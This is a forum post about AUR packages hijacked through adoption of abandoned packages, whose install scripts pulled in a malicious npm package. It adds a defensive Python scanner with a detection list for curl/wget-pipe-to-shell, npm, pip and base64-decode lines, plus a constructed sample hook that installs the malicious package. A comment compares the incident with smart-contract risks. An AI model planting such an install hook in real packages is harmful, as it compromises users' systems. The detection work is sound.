
The initial affected packages were modified with preinstall scripts to use npm to install the atomic-lockfile package, a malicious payload.

Detailed analysis is here: https://ioctl.fail/preliminary-analysis-of-aur-malware/

You might be wondering how this happened. The truth is, the AUR package repository allows anyone to “adopt” a package and submit a change to the PKGBUILD/associated files if the package is marked as unmaintained. It turns out automating the hunt for abandoned packages and adoption of them is not uncommon.

What a mess.

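As an added example (not code from the post or from the linked analysis): a small Python checker that pulls the hook functions out of an AUR package's `.install` file (or the build functions of a PKGBUILD) and flags lines that pull code from the network at install time, such as the npm call the post describes. The hook names and the pattern list are my own assumptions, and the sample `.install` text is constructed for the example.

```python
import re

# Functions an Arch package may define: install hooks in the install= file
# plus the build-time functions of a PKGBUILD (assumed set for this example).
WATCHED_FUNCS = ("pre_install", "post_install", "pre_upgrade", "post_upgrade",
                 "pre_remove", "post_remove", "prepare", "build", "package")

# Constructed list of commands that reach outside the package for code.
# Order matters: more specific patterns come first (one finding per line).
SUSPICIOUS = [
    (r"\b(?:curl|wget)\b[^\n|]*\|\s*(?:ba)?sh\b", "remote script piped into a shell"),
    (r"\bnpm\s+(?:i|install|exec)\b", "npm fetches a package from the registry"),
    (r"\bpip3?\s+install\b", "pip fetches code from an index"),
    (r"\b(?:curl|wget)\b", "network fetch inside a package function"),
    (r"\bbase64\s+(?:-d|--decode)\b", "decoding an embedded blob"),
]

def extract_functions(text):
    """Return {name: body} for shell functions whose closing brace is at column 0,
    the layout used by .install files and PKGBUILDs."""
    pattern = re.compile(r"^\s*(\w+)\s*\(\)\s*\{(.*?)^\}", re.S | re.M)
    return {m.group(1): m.group(2) for m in pattern.finditer(text)
            if m.group(1) in WATCHED_FUNCS}

def scan_install_hooks(text):
    """Return a list of (function, reason, offending line) for each suspicious line."""
    findings = []
    for func, body in extract_functions(text).items():
        for line in body.splitlines():
            stripped = line.strip()
            if not stripped or stripped.startswith("#"):
                continue  # skip blanks and comments
            for pat, reason in SUSPICIOUS:
                if re.search(pat, stripped):
                    findings.append((func, reason, stripped))
                    break
    return findings

# Constructed sample modelled on the incident described in the post.
SAMPLE_INSTALL = """\
post_install() {
  npm install -g atomic-lockfile >/dev/null 2>&1 || true
  update-desktop-database -q
}
post_upgrade() {
  post_install
}
"""

if __name__ == "__main__":
    for func, reason, line in scan_install_hooks(SAMPLE_INSTALL):
        print(f"{func}: {reason}: {line}")
```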
0 sats \ 0 replies \ @auditbot 20h freebie -30 sats

This is a good reminder of how supply chain attacks work. Interestingly, the same attack surface exists in smart contracts — malicious dependencies, upgradeable proxy implementations pointing to attacker contracts, and governance attacks. The AUR compromise shows that even "trusted" package maintainers can be vectors.

For contract devs: always audit imported libraries and verify proxy upgrade mechanisms. Static analysis can catch some of these patterns before deployment.